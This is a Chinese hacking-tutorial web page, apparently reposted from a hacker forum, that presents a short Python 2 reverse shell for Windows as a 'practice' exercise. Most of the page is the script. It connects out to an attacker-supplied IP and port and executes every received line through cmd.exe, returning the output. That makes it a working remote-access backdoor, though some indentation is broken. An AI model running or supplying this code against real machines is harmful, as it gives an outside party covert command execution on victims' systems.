收藏本站 收藏本站
积木网首页 - 软件测试 - 常用手册 - 站长工具 - 技术社区
积木学院 > 黑客技术 > 黑客编程 > 正文

python 写的一个反向连接的shell

来源:互联摘选 日期:2007-12-03 05:34

作者:无敌最寂寞
来源:邪恶八进制

_content>最近在复习python,顺便写了一个简单的反向shell。。纯粹是为了练笔。。因为python大部分都存在于linux/unix中,在windows中很少有安装python(尤其是服务器,除非web是python写的)。但我这个shell是一个windows的shell,不过稍加一改就可以在linux/unix下运行了。。。

拿出来怕大家笑话,不过对于那些想学python却还犹豫不决的朋友一个直观的印象吧。。。总之python确实可以称得上世界上最棒的脚本语言,我想它的应用会越来越广泛。。。

下面是代码,高手不要笑我了。。(要知道我能厚者脸皮拿出来,也是经过一番撕心裂肺的斗争的~~:——))

_one>
#!/usr/bin/python

import sys
import os
from socket import *
import string

def usage(name):
     print '\t\tPython connect back shell\n\n'
     print '\t\t     superlone@EST\n\n'
     print 'Usage:\n\t %s <connect back ip> <connect back port>\n' % name

if len(sys.argv)==1 or len(sys.argv)>3:
     usage(sys.argv[0])
     sys.exit(0)

conIP=sys.argv[1]
conPort=int(sys.argv[2])
welcome='\t\t[welcome to the way home]\n'

try:
    sock=socket(AF_INET,SOCK_STREAM)
    sock.connect((conIP,conPort))
except:
  print '[-]Socket Error!\n'
  sys.exit(0)

sock.send(welcome)
prompt='superlone>'
while 1:
  sock.send(prompt)
  while 1:
    data=sock.recv(1024)
    if data:break
  if data[:-1]=='exit':
     sock.send('bye bye')
    sock.close()
    sys.exit(0)
  if data[:-1]=='pwd':
     sock.send(os.getcwd()+'\n')
  for i in range(len(data.split())):
     if 'cd' in data.split():
           try:
                 os.chdir(data.split()[i+1])
           except:
                 sock.send('dir change failed!\n')

  rpipe=os.popen('cmd.exe /c '+data[:-1])
  sdata=rpipe.read()
  rpipe.close()
  sock.send(sdata)

推荐阅读

 

热点信息

 
强悍的草根IT技术社区,这里应该有您想要的!
Copyright © 2010 Gimoo.Net. All Rights Rreserved  京ICP备05050695号